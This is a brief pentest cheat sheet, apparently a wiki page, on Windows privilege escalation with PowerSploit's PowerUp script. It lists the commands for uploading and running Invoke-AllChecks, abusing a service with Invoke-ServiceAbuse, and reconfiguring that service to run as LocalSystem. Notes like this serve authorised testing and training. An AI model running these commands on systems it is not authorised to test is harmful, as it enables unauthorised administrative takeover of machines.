3. Privilege Escalation - Windows
PowerUp
-
Upload the following script to the host
/usr/share/windows-resources/powersploit/Privesc/PowerUp.ps1 -
Load on the target and run it
. .\\PowerUp.ps1 Invoke-AllChecks -
Troubleshoot, make sure the service you are trying to abuse is actually started.
Abusing services
. .\\PowerUp.ps1
Invoke-AllChecks # if a service is discovered do the things over there ->
Invoke-ServiceAbuse -Name 'Service'
sc query Service
sc config Service start=auto
sc config Service obj=LocalSystem
No comments to display
No comments to display